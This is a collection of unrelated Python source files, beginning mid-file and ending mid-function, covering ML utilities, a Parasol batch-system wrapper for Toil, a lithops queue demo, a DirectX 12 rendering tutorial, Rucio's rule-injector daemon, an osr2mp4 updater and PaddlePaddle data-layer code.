:param mul: optional multiplication coefficient (e.g. for percentage)
:param tex: if True returns mean +- half_conf_interval for latex
:return: a list or a string in latex
"""
measures = np.array(measures) * mul
ms = np.mean(measures), np.std(measures), half_int(measures)
return ms if not tex else r"${:.2f} \pm {:.2f}$".format(ms[0], ms[2])
def leaky_relu(x, alpha, name=None):
"""
Implements leaky relu with negative coefficient `alpha`
"""
import tensorflow as tf
with tf.name_scope(name, "leaky_relu_{}".format(alpha)):
return tf.nn.relu(x) - alpha * tf.nn.relu(-x)
def execute(target, *args, **kwargs):
pr = multiprocessing.Process(target=target, args=args, kwargs=kwargs)
pr.start()
return pr
def get_global_step(name="GlobalStep", init=0):
import tensorflow as tf
return tf.get_variable(
name,
initializer=init,
trainable=False,
collections=[tf.GraphKeys.GLOBAL_STEP, tf.GraphKeys.GLOBAL_VARIABLES],
)
class DefaultOrderedDict(OrderedDict):
# Source: http://stackoverflow.com/a/6190500/562769
def __init__(self, default_factory=None, *a, **kw):
if default_factory is not None and not isinstance(default_factory, Callable):
raise TypeError("first argument must be callable")
OrderedDict.__init__(self, *a, **kw)
self.default_factory = default_factory
def __getitem__(self, key):
try:
return OrderedDict.__getitem__(self, key)
except KeyError:
return self.__missing__(key)
def __missing__(self, key):
if self.default_factory is None:
raise KeyError(key)
self[key] = value = self.default_factory()
return value
def __reduce__(self):
if self.default_factory is None:
args = tuple()
else:
args = (self.default_factory,)
return type(self), args, None, None, self.items()
def copy(self):
return self.__copy__()
def __copy__(self):
return type(self)(self.default_factory, self)
def __deepcopy__(self, memo):
import copy
return type(self)(self.default_factory, copy.deepcopy(self.items()))
def __repr__(self):
return "OrderedDefaultDict(%s, %s)" % (
self.default_factory,
OrderedDict.__repr__(self),
)
|
parasol.py
|
#!/usr/bin/env python
# Copyright (C) 2015 UCSC Computational Genomics Lab
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import logging
import os
import re
import sys
import subprocess
import time
from Queue import Empty
from multiprocessing import Process
from multiprocessing import JoinableQueue as Queue
#from threading import Thread
#from Queue import Queue, Empty
from toil.batchSystems.abstractBatchSystem import AbstractBatchSystem
logger = logging.getLogger( __name__ )
def getParasolResultsFileName(toilPath):
return os.path.join(toilPath, "results.txt")
def popenParasolCommand(command, runUntilSuccessful=True):
"""Issues a parasol command using popen to capture the output.
If the command fails then it will try pinging parasol until it gets a response.
When it gets a response it will recursively call the issue parasol command, repeating this pattern
for a maximum of N times.
The final exit value will reflect this.
"""
while True:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=sys.stderr, bufsize=-1)
output, nothing = process.communicate() #process.stdout.read().strip()
exitValue = process.wait()
if exitValue == 0:
return 0, output.split("\n")
message = "The following parasol command failed (exit value %s): %s" % (exitValue, command)
if not runUntilSuccessful:
logger.error(message)
return exitValue, None
else:
logger.warn(message)
time.sleep(10)
logger.warn("Waited for a few seconds, will try again")
def getUpdatedJob(parasolResultsFile, outputQueue1, outputQueue2):
"""We use the parasol results to update the status of jobs, adding them
to the list of updated jobs.
Results have the following structure.. (thanks Mark D!)
int status; /* Job status - wait() return format. 0 is good. */
char *host; /* Machine job ran on. */
char *jobId; /* Job queuing system job ID */
char *exe; /* Job executable file (no path) */
int usrTicks; /* 'User' CPU time in ticks. */
int sysTicks; /* 'System' CPU time in ticks. */
unsigned submitTime; /* Job submission time in seconds since 1/1/1970 */
unsigned startTime; /* Job start time in seconds since 1/1/1970 */
unsigned endTime; /* Job end time in seconds since 1/1/1970 */
char *user; /* User who ran job */
char *errFile; /* Location of stderr file on host */
plus you finally have the command name..
"""
parasolResultsFileHandle = open(parasolResultsFile, 'r')
while True:
line = parasolResultsFileHandle.readline()
if line != '':
results = line.split()
result = int(results[0])
jobID = int(results[2])
outputQueue1.put(jobID)
outputQueue2.put((jobID, result))
else:
time.sleep(0.01) #Go to sleep to avoid churning
class ParasolBatchSystem(AbstractBatchSystem):
"""The interface for Parasol.
"""
def __init__(self, config, maxCores, maxMemory, maxDisk):
AbstractBatchSystem.__init__(self, config, maxCores, maxMemory, maxDisk) #Call the parent constructor
if maxMemory != sys.maxint:
logger.warn("A max memory has been specified for the parasol batch system class of %i, but currently "
"this batchsystem interface does not support such limiting" % maxMemory)
#Keep the name of the results file for the pstat2 command..
self.parasolCommand = config.parasolCommand
self.parasolResultsFile = getParasolResultsFileName(config.jobStore)
#Reset the job queue and results (initially, we do this again once we've killed the jobs)
self.queuePattern = re.compile("q\s+([0-9]+)")
self.runningPattern = re.compile("r\s+([0-9]+)\s+[\S]+\s+[\S]+\s+([0-9]+)\s+[\S]+")
self.killBatchJobs(self.getIssuedBatchJobIDs()) #Kill any jobs on the current stack
logger.info("Going to sleep for a few seconds to kill any existing jobs")
time.sleep(5) #Give batch system a second to sort itself out.
logger.info("Removed any old jobs from the queue")
#Reset the job queue and results
exitValue = popenParasolCommand("%s -results=%s clear sick" % (self.parasolCommand, self.parasolResultsFile), False)[0]
if exitValue is not None:
logger.warn("Could not clear sick status of the parasol batch %s" % self.parasolResultsFile)
exitValue = popenParasolCommand("%s -results=%s flushResults" % (self.parasolCommand, self.parasolResultsFile), False)[0]
if exitValue is not None:
logger.warn("Could not flush the parasol batch %s" % self.parasolResultsFile)
open(self.parasolResultsFile, 'w').close()
logger.info("Reset the results queue")
#Stuff to allow max cpus to be work
self.outputQueue1 = Queue()
self.outputQueue2 = Queue()
#worker = Thread(target=getUpdatedJob, args=(self.parasolResultsFileHandle, self.outputQueue1, self.outputQueue2))
#worker.setDaemon(True)
worker = Process(target=getUpdatedJob, args=(self.parasolResultsFile, self.outputQueue1, self.outputQueue2))
worker.daemon = True
worker.start()
self.usedCpus = 0
self.jobIDsToCpu = {}
def issueBatchJob(self, command, memory, cores, disk):
"""Issues parasol with job commands.
"""
self.checkResourceRequest(memory, cores, disk)
pattern = re.compile("your job ([0-9]+).*")
parasolCommand = "%s -verbose -ram=%i -cpu=%i -results=%s add job '%s'" % (self.parasolCommand, memory, cores, self.parasolResultsFile, command)
#Deal with the cpus
self.usedCpus += cores
while True: #Process finished results with no wait
try:
jobID = self.outputQueue1.get_nowait()
self.usedCpus -= self.jobIDsToCpu.pop(jobID)
assert self.usedCpus >= 0
self.outputQueue1.task_done()
except Empty:
break
while self.usedCpus > self.maxCores: #If we are still waiting
self.usedCpus -= self.jobIDsToCpu.pop(self.outputQueue1.get())
assert self.usedCpus >= 0
self.outputQueue1.task_done()
#Now keep going
while True:
#time.sleep(0.1) #Sleep to let parasol catch up #Apparently unnecessary
line = popenParasolCommand(parasolCommand)[1][0]
match = pattern.match(line)
if match != None: #This is because parasol add job will return success, even if the job was not properly issued!
break
else:
logger.info("We failed to properly add the job, we will try again after a sleep")
time.sleep(5)
jobID = int(match.group(1))
self.jobIDsToCpu[jobID] = cores
logger.debug("Got the parasol job id: %s from line: %s" % (jobID, line))
logger.debug("Issued the job command: %s with (parasol) job id: %i " % (parasolCommand, jobID))
return jobID
def killBatchJobs(self, jobIDs):
"""Kills the given jobs, represented as Job ids, then checks they are dead by checking
they are not in the list of issued jobs.
"""
while True:
for jobID in jobIDs:
exitValue = popenParasolCommand("%s remove job %i" % (self.parasolCommand, jobID), runUntilSuccessful=False)[0]
logger.info("Tried to remove jobID: %i, with exit value: %i" % (jobID, exitValue))
runningJobs = self.getIssuedBatchJobIDs()
if set(jobIDs).difference(set(runningJobs)) == set(jobIDs):
return
time.sleep(5)
logger.warn("Tried to kill some jobs, but something happened and they are still going, so I'll try again")
def getIssuedBatchJobIDs(self):
"""Gets the list of jobs issued to parasol.
"""
#Example issued job, first field is jobID, last is the results file
#31816891 localhost benedictpaten 2009/07/23 10:54:09 python ~/Desktop/out.txt
issuedJobs = set()
for line in popenParasolCommand("%s -extended list jobs" % self.parasolCommand)[1]:
if line != '':
tokens = line.split()
if tokens[-1] == self.parasolResultsFile:
jobID = int(tokens[0])
issuedJobs.add(jobID)
return list(issuedJobs)
def getRunningBatchJobIDs(self):
"""Returns map of running jobIDs and the time they have been running.
"""
#Example lines..
#r 5410186 benedictpaten worker 1247029663 localhost
#r 5410324 benedictpaten worker 1247030076 localhost
runningJobs = {}
issuedJobs = self.getIssuedBatchJobIDs()
for line in popenParasolCommand("%s -results=%s pstat2 " % (self.parasolCommand, self.parasolResultsFile))[1]:
if line != '':
match = self.runningPattern.match(line)
if match != None:
jobID = int(match.group(1))
startTime = int(match.group(2))
if jobID in issuedJobs: #It's one of our jobs
runningJobs[jobID] = time.time() - startTime
return runningJobs
def getUpdatedBatchJob(self, maxWait):
jobID = self.getFromQueueSafely(self.outputQueue2, maxWait)
if jobID != None:
self.outputQueue2.task_done()
return jobID
@classmethod
def getRescueBatchJobFrequency(cls):
"""Parasol leaks jobs, but rescuing jobs involves calls to parasol list jobs and pstat2,
making it expensive.
"""
return 5400 #Once every 90 minutes
def shutdown(self):
pass
def main():
pass
def _test():
import doctest
return doctest.testmod()
if __name__ == '__main__':
_test()
main()
|
buffered_queue.py
|
import lithops.multiprocessing as mp
from lithops.multiprocessing import Process, Queue
import time
import random
def work(remote_queue):
for i in range(5):
remote_queue.put('Working hard ... {}'.format(i))
time.sleep(random.random())
if __name__ == '__main__':
queue = Queue()
process = Process(target=work, args=(queue,))
# ctx = mp.get_context('spawn')
# queue = ctx.Queue()
# process = ctx.Process(target=work, args=(queue,))
process.start()
process.join()
while True:
try:
data = queue.get(timeout=3)
print(data)
except queue.Empty:
print('Queue empty!')
break
|
tutorial014.py
|
import time
from pydx12 import *
from utils import get_best_adapter, enable_debug, print_debug, setup_debug, Barrier, Rasterizer, Mesh, GLTF
from PIL import Image
import gc
import sys
import time
import random
import numpy
import threading
from queue import Queue
from pyrr import matrix44
import struct
enable_debug()
device = D3D12CreateDevice(get_best_adapter())
print(device)
setup_debug(device)
print('DEBUG SET')
window = Window('pydx12: Tutorial 011 (SwapChain)', 1024, 1024)
print(window)
command_queue_desc = D3D12_COMMAND_QUEUE_DESC(
Type=D3D12_COMMAND_LIST_TYPE_DIRECT)
queue = device.CreateCommandQueue(command_queue_desc)
swap_chain_desc1 = DXGI_SWAP_CHAIN_DESC1(Format=DXGI_FORMAT_R8G8B8A8_UNORM, BufferUsage=DXGI_USAGE_RENDER_TARGET_OUTPUT,
BufferCount=2, Scaling=DXGI_SCALING_STRETCH, SwapEffect=DXGI_SWAP_EFFECT_FLIP_DISCARD)
swap_chain_desc1.SampleDesc.Count = 1
swap_chain = CreateDXGIFactory2().CreateSwapChainForHwnd(
queue, window, swap_chain_desc1)
descriptor_heap_desc = D3D12_DESCRIPTOR_HEAP_DESC(
Type=D3D12_DESCRIPTOR_HEAP_TYPE_RTV,
NumDescriptors=2)
descriptor_heap = device.CreateDescriptorHeap(descriptor_heap_desc)
rtvs = descriptor_heap.cpu((0, 1))
device.CreateRenderTargetView(swap_chain.GetBuffer(0), None, rtvs[0])
device.CreateRenderTargetView(swap_chain.GetBuffer(1), None, rtvs[1])
gltf = GLTF('Duck.gltf')
mesh = Mesh(device)
#print(gltf.get_indices(0), gltf.get_vertices(0), gltf.get_nvertices(0))
#print(len(gltf.get_indices(0)), len(gltf.get_vertices(0)), gltf.get_nvertices(0))
mesh.set_index_buffer(gltf.get_indices(0))
mesh.set_vertex_buffer(gltf.get_vertices(0))
try:
mesh.set_color_buffer(gltf.get_colors(0))
except:
mesh.set_color_buffer(struct.pack('f', 1) * mesh.npositions)
mesh.set_nvertices(gltf.get_nvertices(0))
rasterizer = Rasterizer(device)
running = True
fps = 0
message_queue = Queue()
def render_loop():
theta = 0
forward = 0
fence = device.CreateFence()
fence_event = Event()
fence_value = fence.GetCompletedValue()
fence_value += 1
frame_counter = 0
counter = 0
frequency = QueryPerformanceFrequency()
now = QueryPerformanceCounter()
while running:
theta += 0.05
forward = -2 # 10.01
scale = matrix44.create_from_scale((1, 1, 1), dtype='float32')
rotation = matrix44.create_from_y_rotation(theta, dtype='float32')
translation = matrix44.create_from_translation(
(0, 0, forward), dtype='float32')
perspective = matrix44.create_perspective_projection(
60., 1., 0.1, 1000., dtype='float32')
#mesh.matrix = scale @ rotation @ translation @ perspective
mesh.matrix = scale @ rotation @ translation @ perspective
back_buffer_index = swap_chain.GetCurrentBackBufferIndex()
back_buffer = swap_chain.GetBuffer(back_buffer_index)
rasterizer.execute(queue, back_buffer,
rtvs[back_buffer_index], [mesh])
queue.Signal(fence, fence_value)
if fence.GetCompletedValue() < fence_value:
fence.SetEventOnCompletion(fence_value, fence_event)
fence_event.wait()
fence_value += 1
swap_chain.Present(1)
new_now = QueryPerformanceCounter()
counter += new_now - now
now = new_now
if counter >= frequency:
counter -= frequency
fps = frame_counter
message_queue.put(str(fps))
frame_counter = 1
else:
frame_counter += 1
t = threading.Thread(target=render_loop)
t.start()
while running:
window.dequeue()
if not message_queue.empty():
new_title = message_queue.get_nowait()
window.set_title(new_title)
running = False
t.join()
print('END')
|
injector.py
|
# -*- coding: utf-8 -*-
# Copyright 2015-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2015-2021
# - Vincent Garonne <vincent.garonne@cern.ch>, 2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Brandon White <bjwhite@fnal.gov>, 2019
# - Thomas Beermann <thomas.beermann@cern.ch>, 2020-2021
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020
# - Eric Vaandering <ewv@fnal.gov>, 2020
"""
Judge-Injector is a daemon to asynchronously create replication rules
"""
import logging
import os
import socket
import threading
import time
from copy import deepcopy
from datetime import datetime, timedelta
from random import randint
from re import match
from sqlalchemy.exc import DatabaseError
import rucio.db.sqla.util
from rucio.common.logging import formatted_logger, setup_logging
from rucio.common.exception import (DatabaseException, RuleNotFound, RSEWriteBlocked,
ReplicationRuleCreationTemporaryFailed, InsufficientAccountLimit)
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.monitor import record_counter
from rucio.core.rule import inject_rule, get_injected_rules, update_rule
graceful_stop = threading.Event()
def rule_injector(once=False):
"""
Main loop to check for asynchronous creation of replication rules
"""
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
paused_rules = {} # {rule_id: datetime}
# Make an initial heartbeat so that all judge-inectors have the correct worker number on the next try
executable = 'judge-injector'
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread, older_than=2 * 60 * 60)
prefix = 'judge-injector[%i/%i] ' % (heartbeat['assign_thread'], heartbeat['nr_threads'])
logger = formatted_logger(logging.log, prefix + '%s')
graceful_stop.wait(1)
while not graceful_stop.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread, older_than=2 * 60 * 60)
prefix = 'judge-injector[%i/%i] ' % (heartbeat['assign_thread'], heartbeat['nr_threads'])
logger = formatted_logger(logging.log, prefix + '%s')
start = time.time()
# Refresh paused rules
iter_paused_rules = deepcopy(paused_rules)
for key in iter_paused_rules:
if datetime.utcnow() > paused_rules[key]:
del paused_rules[key]
rules = get_injected_rules(total_workers=heartbeat['nr_threads'],
worker_number=heartbeat['assign_thread'],
limit=100,
blocked_rules=[key for key in paused_rules])
logger(logging.DEBUG, 'index query time %f fetch size is %d' % (time.time() - start, len(rules)))
if not rules and not once:
logger(logging.DEBUG, 'did not get any work (paused_rules=%s)' % str(len(paused_rules)))
graceful_stop.wait(60)
else:
for rule in rules:
rule_id = rule[0]
logger(logging.INFO, 'Injecting rule %s' % rule_id)
if graceful_stop.is_set():
break
try:
start = time.time()
inject_rule(rule_id=rule_id, logger=logger)
logger(logging.DEBUG, 'injection of %s took %f' % (rule_id, time.time() - start))
except (DatabaseException, DatabaseError) as e:
if match('.*ORA-00054.*', str(e.args[0])):
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(60, 600))
record_counter('rule.judge.exceptions.LocksDetected')
logger(logging.WARNING, 'Locks detected for %s' % rule_id)
elif match('.*QueuePool.*', str(e.args[0])):
logger(logging.WARNING, 'DatabaseException', exc_info=True)
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logger(logging.WARNING, 'DatabaseException', exc_info=True)
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logger(logging.ERROR, 'DatabaseException', exc_info=True)
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except (RSEWriteBlocked) as e:
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(60, 600))
logger(logging.WARNING, 'RSEWriteBlocked for rule %s' % rule_id)
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except ReplicationRuleCreationTemporaryFailed as e:
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(60, 600))
logger(logging.WARNING, 'ReplicationRuleCreationTemporaryFailed for rule %s' % rule_id)
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except RuleNotFound:
pass
except InsufficientAccountLimit:
# A rule with InsufficientAccountLimit on injection hangs there potentially forever
# It should be marked as SUSPENDED
logger(logging.INFO, 'Marking rule %s as SUSPENDED due to InsufficientAccountLimit' % rule_id)
update_rule(rule_id=rule_id, options={'state': 'SUSPENDED'})
except (DatabaseException, DatabaseError) as e:
if match('.*QueuePool.*', str(e.args[0])):
logger(logging.WARNING, 'DatabaseException', exc_info=True)
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logger(logging.WARNING, 'DatabaseException', exc_info=True)
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logger(logging.CRITICAL, 'DatabaseException', exc_info=True)
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except Exception as e:
logger(logging.CRITICAL, 'Exception', exc_info=True)
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
if once:
break
die(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1):
"""
Starts up the Judge-Injector threads.
"""
setup_logging()
if rucio.db.sqla.util.is_old_db():
raise DatabaseException('Database was not updated, daemon won\'t start')
executable = 'judge-injector'
hostname = socket.gethostname()
sanity_check(executable=executable, hostname=hostname)
if once:
rule_injector(once)
else:
logging.info('Injector starting %s threads' % str(threads))
threads = [threading.Thread(target=rule_injector, kwargs={'once': once}) for i in range(0, threads)]
[t.start() for t in threads]
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
updater.py
|
import sys
import subprocess
import threading
import os
import PyQt5
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import QLabel, QApplication, QSizePolicy, QDesktopWidget, QWidget
from abspath import abspath
class Window(QWidget):
def __init__(self):
super().__init__()
self.left = 0
self.top = 0
self.width = 242
self.height = 242
self.label = QLabel(self)
self.setGeometry(self.left, self.top, self.width, self.height)
self.setFixedSize(self.width, self.height)
self.upgradelist = ["osr2mp4", "osr2mp4app"]
self.setSizePolicy(QSizePolicy(QSizePolicy.Ignored, QSizePolicy.Ignored))
self.a = threading.Thread(target=self.install)
self.osrLogoUpdater()
def osrLogoUpdater(self):
pixmap = QPixmap(os.path.join(abspath, 'res/OsrUpdater.png'))
self.setFixedSize(pixmap.width(), pixmap.height())
self.label.setPixmap(pixmap)
self.setAttribute(PyQt5.QtCore.Qt.WA_TranslucentBackground)
self.setWindowFlags(PyQt5.QtCore.Qt.FramelessWindowHint)
self.center()
self.show()
def center(self):
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def install(self):
for i in self.upgradelist:
subprocess.call([sys.executable, "-m", "pip", "install", i, "--upgrade"])
QApplication.quit()
qtpath = os.path.dirname(PyQt5.__file__)
pluginpath = os.path.join(qtpath, "Qt/plugins")
os.environ['QT_QPA_PLATFORM_PLUGIN_PATH'] = pluginpath
app = QApplication([])
window = Window()
window.a.start()
app.exec_()
window.a.join()
|
io.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from ..wrapped_decorator import signature_safe_contextmanager
import multiprocessing
import os
import six
import threading
from ..data_feeder import DataFeeder
from .control_flow import BlockGuard
from .layer_function_generator import templatedoc
from .. import core
from ..executor import global_scope
from ..framework import convert_np_dtype_to_dtype_, default_main_program, \
default_startup_program, program_guard, Program, Variable
from ..layer_helper import LayerHelper
from ..unique_name import generate as unique_name
import logging
__all__ = [
'data', 'open_files', 'read_file', 'shuffle', 'batch', 'double_buffer',
'random_data_generator', 'py_reader', 'create_py_reader_by_data',
'Preprocessor', 'load'
]
def data(name,
shape,
append_batch_size=True,
dtype='float32',
lod_level=0,
type=core.VarDesc.VarType.LOD_TENSOR,
stop_gradient=True):
"""
**Data Layer**
This function takes in the input and based on whether data has
to be returned back as a minibatch, it creates the global variable by using
the helper functions. The global variables can be accessed by all the
following operators in the graph.
All the input variables of this function are passed in as local variables
to the LayerHelper constructor.
Notice that paddle would only use :code:`shape` to infer the shapes of
following variables in the network during compile-time. During run-time,
paddle would not check whether the shape of the feeded data matches the
:code:`shape` settings in this function.
Args:
name(str): The name/alias of the function
shape(list): Tuple declaring the shape. If :code:`append_batch_size` is
True and there is no -1 inside :code:`shape`, it should be
considered as the shape of the each sample. Otherwise, it
should be considered as the shape of the batched data.
append_batch_size(bool):
1. If true, it prepends -1 to the shape.
For example if shape=[1], the resulting shape is [-1, 1]. This will
be useful to set different batch size at run time.
2. If shape contains -1, such as shape=[1, -1].
append_batch_size will be enforced to be be False (ineffective)
because PaddlePaddle cannot set more than 1 unknown number on the
shape.
dtype(np.dtype|VarType|str): The type of data : float32, float16, int etc
type(VarType): The output type. By default it is LOD_TENSOR.
lod_level(int): The LoD Level. 0 means the input data is not a sequence.
stop_gradient(bool): A boolean that mentions whether gradient should flow.
Returns:
Variable: The global variable that gives access to the data.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.layers.data(name='x', shape=[784], dtype='float32')
"""
helper = LayerHelper('data', **locals())
shape = list(shape)
for i in six.moves.range(len(shape)):
if shape[i] is None:
shape[i] = -1
append_batch_size = False
elif shape[i] < 0:
append_batch_size = False
if append_batch_size:
shape = [-1] + shape # append batch size as -1
data_var = helper.create_global_variable(
name=name,
shape=shape,
dtype=dtype,
type=type,
stop_gradient=stop_gradient,
lod_level=lod_level,
is_data=True)
return data_var
class BlockGuardServ(BlockGuard):
"""
BlockGuardServ class.
BlockGuardServ class is used to create an op with a block in a program.
"""
def __init__(self, server):
if not (isinstance(server, ListenAndServ)):
raise TypeError("BlockGuardServ takes a ListenAndServ")
super(BlockGuardServ, self).__init__(server.helper.main_program)
self.server = server
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
return False
self.server.complete_op()
return super(BlockGuardServ, self).__exit__(exc_type, exc_val, exc_tb)
class ListenAndServ(object):
"""
**ListenAndServ Layer**
ListenAndServ is used to create a rpc server bind and listen
on specific TCP port, this server will run the sub-block when
received variables from clients.
Args:
endpoint(string): IP:port string which the server will listen on.
inputs(list): a list of variables that the server will get from clients.
fan_in(int): how many client are expected to report to this server, default: 1.
optimizer_mode(bool): whether to run the server as a parameter server, default: True.
Examples:
.. code-block:: python
import paddle.fluid as fluid
with fluid.program_guard(main):
serv = layers.ListenAndServ(
"127.0.0.1:6170", ["X"], optimizer_mode=False)
with serv.do():
x = layers.data(
shape=[32, 32],
dtype='float32',
name="X",
append_batch_size=False)
fluid.initializer.Constant(value=1.0)(x, main.global_block())
layers.scale(x=x, scale=10.0, out=out_var)
exe = fluid.Executor(place)
exe.run(main)
"""
def __init__(self, endpoint, inputs, fan_in=1, optimizer_mode=True):
self.helper = LayerHelper("listen_and_serv")
self.inputs = inputs
self.outputs = []
self.endpoint = endpoint
self.fan_in = fan_in
# FIXME(typhoonzero): add optimizer_mode is stupid, should make it more
# general.
self.optimizer_mode = optimizer_mode
def do(self):
return BlockGuardServ(self)
def get_params_and_grads(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
# params and grads in the same order.
params = list()
grads = list()
for op in current_block.ops:
# FIXME(typhoonzero): op.inputs is None if it's cloned.
if self.optimizer_mode:
if "Grad" in op.inputs and "Param" in op.inputs:
params.append(op.inputs["Param"].name)
grads.append(op.inputs["Grad"].name)
else:
# simple recv mode, recv operators inputs.
for iname in op.input_names:
for in_var_name in op.input(iname):
params.append(parent_block.var(in_var_name))
grads.append(parent_block.var(in_var_name))
return params, grads
def parent_block(self):
prog = self.helper.main_program
parent_idx = prog.current_block().parent_idx
assert parent_idx >= 0
parent_block = prog.block(parent_idx)
return parent_block
def complete_op(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
parent_block.append_op(
type='listen_and_serv',
inputs={"X": self.inputs},
outputs={},
attrs={
'endpoint': self.endpoint,
'Fanin': self.fan_in,
'optimize_blocks': [
current_block
], # did not support multiple optimize blocks in layers
'sync_mode': True, # did not support async now in layers
'grad_to_block_id': [""]
})
def Send(endpoints, send_vars, dummy_output=None, sync=True):
"""
Send variables to the server side, and get vars from server
side when server have finished running server side program.
Args:
endpoints (str): comma seperated IP:PORT pairs in the order
of send_vars to send
send_vars (list): variables to send to server
sync (bool): whether to wait the request finish
"""
assert (type(send_vars) == list)
if dummy_output is None:
dummy_output = []
elif isinstance(dummy_output, Variable):
dummy_output = [dummy_output]
assert (type(dummy_output) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Send", **locals())
rpc_op_role_name = core.op_proto_and_checker_maker.kOpRoleAttrName()
helper.append_op(
type="send",
inputs={"X": send_vars},
outputs={"Out": dummy_output},
attrs={
"endpoints": endpoints,
"epmap": epmap,
rpc_op_role_name: core.op_proto_and_checker_maker.OpRole.RPC
})
if sync:
helper.append_op(
type="send_barrier",
inputs={"X": dummy_output},
outputs={"Out": []},
attrs={"endpoints": endpoints})
def Recv(endpoints, get_vars, dummy_input=None, sync=True):
"""
Receive variables from server side
Args:
endpoints (str): comma seperated IP:PORT pairs in the order
of send_vars to send
get_vars (list): vars to get from server after send completes.
sync (bool): whether to wait the request finish
Returns:
list: list of received variables
"""
assert (type(get_vars) == list)
if dummy_input is None:
dummy_input = []
elif isinstance(dummy_input, Variable):
dummy_input = [dummy_input]
assert (type(dummy_input) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Recv", **locals())
helper.append_op(
type="recv",
inputs={"X": dummy_input},
outputs={"Out": get_vars},
attrs={"endpoints": endpoints,
"epmap": epmap})
if sync:
helper.append_op(
type="fetch_barrier",
outputs={"Out": get_vars},
attrs={"endpoints": endpoints})
return get_vars
def monkey_patch_reader_methods(reader):
def __get_reader__():
scope = global_scope()
var = scope.find_var(reader.name)
return var.get_reader()
def reset():
return __get_reader__().reset()
reader.reset = reset
reader.stop_gradient = True
reader.persistable = True
return reader
def _copy_reader_var_(block, var):
new_var = block.create_var(name=var.name, type=core.VarDesc.VarType.READER)
new_var.desc.set_shapes(var.desc.shapes())
new_var.desc.set_dtypes(var.desc.dtypes())
new_var.desc.set_lod_levels(var.desc.lod_levels())
new_var.persistable = True
return new_var
def _copy_reader_create_op_(block, op):
input_param_names = op.input_names
new_input_map = {}
for param_name in input_param_names:
new_input_map[param_name] = []
arg_names = op.input(param_name)
for arg_name in arg_names:
new_input_map[param_name].append(block.var(arg_name))
output_param_names = op.output_names
new_output_map = {}
for param_name in output_param_names:
new_output_map[param_name] = []
arg_names = op.output(param_name)
for arg_name in arg_names:
new_output_map[param_name].append(block.var(arg_name))
new_op = block.append_op(
type=op.type,
inputs=new_input_map,
outputs=new_output_map,
attrs=op.all_attrs())
return new_op
@templatedoc(op_type='create_recordio_file_reader')
def open_recordio_file(filename,
shapes,
lod_levels,
dtypes,
pass_num=1,
for_parallel=True):
"""
${comment}
Args:
filename(${filename_type}): ${filename_comment}.
shapes(list): List of tuples which declaring data shapes.
lod_levels(${lod_levels_type}): ${lod_levels_comment}.
dtypes(list): List of strs which declaring data type.
pass_num(int): Number of passes to run.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
${out_comment}.
Examples:
>>> import paddle.fluid as fluid
>>> reader = fluid.layers.io.open_recordio_file(
>>> filename='./data.recordio',
>>> shapes=[(3,224,224), (1,)],
>>> lod_levels=[0, 0],
>>> dtypes=['float32', 'int64'])
>>> # Via the reader, we can use 'read_file' layer to get data:
>>> image, label = fluid.layers.io.read_file(reader)
"""
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
